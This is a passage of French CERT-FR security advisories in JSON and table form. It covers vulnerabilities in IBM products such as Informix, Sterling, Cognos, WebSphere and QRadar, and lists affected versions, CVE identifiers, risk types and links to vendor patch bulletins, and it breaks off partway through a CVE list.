| IBM | Informix Dynamic Server | Informix Dynamic Server versions 12.10.x antérieures à 12.10.xC16W2 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "DB2 Data Management Console versions 3.1.x post\u00e9rieures \u00e0 3.1.11 et ant\u00e9rieures \u00e0 3.1.13.1",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 11.2.x ant\u00e9rieures \u00e0 11.2.4 FP6",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Transformation Extender version 10.1.1.1 sans le correctif de s\u00e9curit\u00e9 \n APAR PH67014",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Transformation Extender version 11.0.0.0 sans le correctif de s\u00e9curit\u00e9 \n APAR PH67014",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Transformation Extender version 10.1.0.2 sans le correctif de s\u00e9curit\u00e9 \n APAR PH67014",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 12.0.x ant\u00e9rieures \u00e0 12.0.4 FP1",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Transformation Extender version 10.1.2.1 sans le correctif de s\u00e9curit\u00e9 \n APAR PH67014",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Informix Dynamic Server versions 14.10.x ant\u00e9rieures \u00e0 14.10.xC11W2",
"product": {
"name": "Informix Dynamic Server",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct File Agent versions 1.4.0.x ant\u00e9rieures \u00e0 1.4.0.4",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Transformation Extender versions 11.0.1.x ant\u00e9rieures \u00e0 11.0.1.1 sans le correctif de s\u00e9curit\u00e9 \n APAR PH67016",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "DB2 Data Management Console pour CPD versions ant\u00e9rieures \u00e0 5.1.2",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Informix Dynamic Server versions 12.10.x ant\u00e9rieures \u00e0 12.10.xC16W2",
"product": {
"name": "Informix Dynamic Server",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-21235",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21235"
},
{
"name": "CVE-2025-4447",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4447"
},
{
"name": "CVE-2024-21144",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21144"
},
{
"name": "CVE-2021-43816",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43816"
},
{
"name": "CVE-2024-21534",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21534"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2022-32149",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32149"
},
{
"name": "CVE-2024-10917",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10917"
},
{
"name": "CVE-2025-1302",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1302"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2024-52900",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52900"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2024-27289",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27289"
},
{
"name": "CVE-2022-41721",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41721"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2024-21145",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21145"
},
{
"name": "CVE-2024-4741",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4741"
},
{
"name": "CVE-2025-2900",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2900"
},
{
"name": "CVE-2025-1991",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1991"
},
{
"name": "CVE-2022-23648",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23648"
},
{
"name": "CVE-2023-39325",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39325"
},
{
"name": "CVE-2024-21131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21131"
},
{
"name": "CVE-2024-21210",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21210"
},
{
"name": "CVE-2024-2511",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2511"
},
{
"name": "CVE-2022-21698",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21698"
},
{
"name": "CVE-2024-21217",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21217"
},
{
"name": "CVE-2024-27267",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27267"
},
{
"name": "CVE-2022-27664",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27664"
},
{
"name": "CVE-2024-21208",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21208"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0562",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-07-04T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Injection SQL (SQLi)"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-06-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238455",
"url": "https://www.ibm.com/support/pages/node/7238455"
},
{
"published_at": "2025-07-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238755",
"url": "https://www.ibm.com/support/pages/node/7238755"
},
{
"published_at": "2025-07-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238833",
"url": "https://www.ibm.com/support/pages/node/7238833"
},
{
"published_at": "2025-07-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238824",
"url": "https://www.ibm.com/support/pages/node/7238824"
},
{
"published_at": "2025-07-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238831",
"url": "https://www.ibm.com/support/pages/node/7238831"
},
{
"published_at": "2025-07-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238826",
"url": "https://www.ibm.com/support/pages/node/7238826"
},
{
"published_at": "2025-07-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238830",
"url": "https://www.ibm.com/support/pages/node/7238830"
},
{
"published_at": "2025-07-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238753",
"url": "https://www.ibm.com/support/pages/node/7238753"
},
{
"published_at": "2025-06-27",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238163",
"url": "https://www.ibm.com/support/pages/node/7238163"
}
]
}
CERTFR-2025-AVI-0546
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | WebSphere | WebSphere Application Server versions 8.5.x sans les derniers correctifs de sécurité | ||
| IBM | WebSphere Service Registry and Repository | WebSphere Service Registry and Repository sans les derniers correctifs de sécurité | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web services versions 6.4.x antérieures à 6.4.0.3 | ||
| IBM | WebSphere | WebSphere Application Server versions 9.0.x sans les derniers correctifs de sécurité | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web services versions 6.3.x antérieures à 6.3.0.14 | ||
| IBM | Spectrum | Spectrum Protect Plus versions 10.1.x antérieures à 10.1.17.1 | ||
| IBM | QRadar | QRadar Hub versions antérieures à 3.8.3 | ||
| IBM | AIX | AIX versions 7.3.x sans les derniers correctif de sécurité | ||
| IBM | Db2 | DB2 Data Management Console pour CPD versions antérieures à 4.8.7 | ||
| IBM | QRadar Deployment Intelligence App | QRadar Deployment Intelligence App versions antérieures à 3.0.17 |
References
| Title | Publication Time | Tags | ||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "WebSphere Application Server versions 8.5.x sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Service Registry and Repository sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere Service Registry and Repository",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web services versions 6.4.x ant\u00e9rieures \u00e0 6.4.0.3",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server versions 9.0.x sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web services versions 6.3.x ant\u00e9rieures \u00e0 6.3.0.14",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Spectrum Protect Plus versions 10.1.x ant\u00e9rieures \u00e0 10.1.17.1",
"product": {
"name": "Spectrum",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Hub versions ant\u00e9rieures \u00e0 3.8.3",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "AIX versions 7.3.x sans les derniers correctif de s\u00e9curit\u00e9",
"product": {
"name": "AIX",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "DB2 Data Management Console pour CPD versions ant\u00e9rieures \u00e0 4.8.7",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Deployment Intelligence App versions ant\u00e9rieures \u00e0 3.0.17",
"product": {
"name": "QRadar Deployment Intelligence App",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2023-25577",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25577"
},
{
"name": "CVE-2024-37891",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37891"
},
{
"name": "CVE-2025-27516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27516"
},
{
"name": "CVE-2024-49766",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49766"
},
{
"name": "CVE-2023-23934",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23934"
},
{
"name": "CVE-2024-34069",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34069"
},
{
"name": "CVE-2024-8176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8176"
},
{
"name": "CVE-2020-29651",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29651"
},
{
"name": "CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"name": "CVE-2024-8305",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8305"
},
{
"name": "CVE-2023-1409",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1409"
},
{
"name": "CVE-2024-45338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45338"
},
{
"name": "CVE-2024-7553",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7553"
},
{
"name": "CVE-2024-36124",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36124"
},
{
"name": "CVE-2024-56406",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56406"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-22195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22195"
},
{
"name": "CVE-2024-8207",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8207"
},
{
"name": "CVE-2024-3372",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3372"
},
{
"name": "CVE-2025-33214",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-33214"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2023-46136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46136"
},
{
"name": "CVE-2024-35195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35195"
},
{
"name": "CVE-2019-20916",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20916"
},
{
"name": "CVE-2020-7789",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-7789"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2024-49767",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49767"
},
{
"name": "CVE-2025-41232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41232"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2023-1077",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1077"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2022-42969",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42969"
},
{
"name": "CVE-2023-30861",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30861"
},
{
"name": "CVE-2024-34064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34064"
},
{
"name": "CVE-2023-32681",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32681"
},
{
"name": "CVE-2024-56334",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56334"
},
{
"name": "CVE-2020-28493",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28493"
},
{
"name": "CVE-2024-6375",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6375"
},
{
"name": "CVE-2025-36038",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36038"
},
{
"name": "CVE-2024-6345",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6345"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0546",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-06-27T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-06-27",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238297",
"url": "https://www.ibm.com/support/pages/node/7238297"
},
{
"published_at": "2025-06-23",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7237702",
"url": "https://www.ibm.com/support/pages/node/7237702"
},
{
"published_at": "2025-06-25",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7237967",
"url": "https://www.ibm.com/support/pages/node/7237967"
},
{
"published_at": "2025-06-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238168",
"url": "https://www.ibm.com/support/pages/node/7238168"
},
{
"published_at": "2025-06-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238156",
"url": "https://www.ibm.com/support/pages/node/7238156"
},
{
"published_at": "2025-06-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238155",
"url": "https://www.ibm.com/support/pages/node/7238155"
},
{
"published_at": "2025-06-27",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238295",
"url": "https://www.ibm.com/support/pages/node/7238295"
},
{
"published_at": "2025-06-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238159",
"url": "https://www.ibm.com/support/pages/node/7238159"
}
]
}
CERTFR-2025-AVI-1072
Vulnerability from certfr_avis - Published: 2025-12-05 - Updated: 2025-12-05
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Sterling Partner Engagement Manager Standard Edition | Sterling Partner Engagement Manager Standard Edition versions 6.2.3.x antérieures à 6.2.3.5 | ||
| IBM | QRadar Use Case Manager App | QRadar Use Case Manager App versions antérieures à 4.1.0 | ||
| IBM | Cognos Controller | Cognos Controller versions 11.x antérieures à 11.0.1 FP7 | ||
| IBM | Sterling Partner Engagement Manager Standard Edition | Sterling Partner Engagement Manager Standard Edition versions 6.2.4.x antérieures à 6.2.4.2 | ||
| IBM | Sterling Partner Engagement Manager Essentials Edition | Sterling Partner Engagement Manager Essentials Edition versions 6.2.4.x antérieures à 6.2.4.2 | ||
| IBM | Sterling B2B Integrator | Sterling B2B Integrator versions 6.2.1.1 sans le correctif de sécurité 6.2.1.1_1 | ||
| IBM | Sterling Partner Engagement Manager Essentials Edition | Sterling Partner Engagement Manager Essentials Edition versions 6.2.3.x antérieures à 6.2.3.5 | ||
| IBM | Sterling File Gateway | Sterling File Gateway versions 6.2.1.1 sans le correctif de sécurité 6.2.1.1_1 |
References
| Title | Publication Time | Tags | |||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Sterling Partner Engagement Manager Standard Edition versions 6.2.3.x ant\u00e9rieures \u00e0 6.2.3.5",
"product": {
"name": "Sterling Partner Engagement Manager Standard Edition",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Use Case Manager App versions ant\u00e9rieures \u00e0 4.1.0",
"product": {
"name": "QRadar Use Case Manager App",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Controller versions 11.x ant\u00e9rieures \u00e0 11.0.1 FP7",
"product": {
"name": "Cognos Controller",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Partner Engagement Manager Standard Edition versions 6.2.4.x ant\u00e9rieures \u00e0 6.2.4.2",
"product": {
"name": "Sterling Partner Engagement Manager Standard Edition",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Partner Engagement Manager Essentials Edition versions 6.2.4.x ant\u00e9rieures \u00e0 6.2.4.2",
"product": {
"name": "Sterling Partner Engagement Manager Essentials Edition",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling B2B Integrator versions 6.2.1.1 sans le correctif de s\u00e9curit\u00e9 6.2.1.1_1 ",
"product": {
"name": "Sterling B2B Integrator",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Partner Engagement Manager Essentials Edition versions 6.2.3.x ant\u00e9rieures \u00e0 6.2.3.5",
"product": {
"name": "Sterling Partner Engagement Manager Essentials Edition",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling File Gateway versions 6.2.1.1 sans le correctif de s\u00e9curit\u00e9 6.2.1.1_1 ",
"product": {
"name": "Sterling File Gateway",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-4447",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4447"
},
{
"name": "CVE-2024-55565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55565"
},
{
"name": "CVE-2023-39017",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39017"
},
{
"name": "CVE-2025-47944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47944"
},
{
"name": "CVE-2025-56200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-56200"
},
{
"name": "CVE-2025-48795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48795"
},
{
"name": "CVE-2025-50106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50106"
},
{
"name": "CVE-2025-30754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30754"
},
{
"name": "CVE-2025-7783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2025-12758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12758"
},
{
"name": "CVE-2024-47764",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47764"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2025-57350",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57350"
},
{
"name": "CVE-2024-12905",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12905"
},
{
"name": "CVE-2025-48913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48913"
},
{
"name": "CVE-2025-47935",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47935"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2025-30761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30761"
},
{
"name": "CVE-2025-5889",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5889"
},
{
"name": "CVE-2025-30749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30749"
},
{
"name": "CVE-2019-20149",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20149"
},
{
"name": "CVE-2025-46653",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46653"
},
{
"name": "CVE-2025-7339",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7339"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2025-48997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48997"
},
{
"name": "CVE-2025-48387",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48387"
},
{
"name": "CVE-2025-58754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
},
{
"name": "CVE-2025-7338",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7338"
},
{
"name": "CVE-2025-59343",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59343"
}
],
"initial_release_date": "2025-12-05T00:00:00",
"last_revision_date": "2025-12-05T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-1072",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-12-05T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-12-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7253432",
"url": "https://www.ibm.com/support/pages/node/7253432"
},
{
"published_at": "2025-12-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7253254",
"url": "https://www.ibm.com/support/pages/node/7253254"
},
{
"published_at": "2025-12-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7253227",
"url": "https://www.ibm.com/support/pages/node/7253227"
},
{
"published_at": "2025-12-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7253232",
"url": "https://www.ibm.com/support/pages/node/7253232"
},
{
"published_at": "2025-12-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7253281",
"url": "https://www.ibm.com/support/pages/node/7253281"
}
]
}
CERTFR-2025-AVI-0481
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
References
| Title | Publication Time | Tags | ||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "IBM Cloud Pak for Security versions 1.10.x ant\u00e9rieures \u00e0 1.11.3.0",
"product": {
"name": "Cloud Pak",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Suite Software versions post\u00e9rieures \u00e0 1.10.12.0 et ant\u00e9rieures \u00e0 1.11.3.0 ",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-32996",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32996"
},
{
"name": "CVE-2019-11038",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11038"
},
{
"name": "CVE-2021-38593",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-38593"
},
{
"name": "CVE-2025-1334",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1334"
},
{
"name": "CVE-2020-15250",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15250"
},
{
"name": "CVE-2023-37920",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37920"
},
{
"name": "CVE-2024-0793",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0793"
},
{
"name": "CVE-2017-9047",
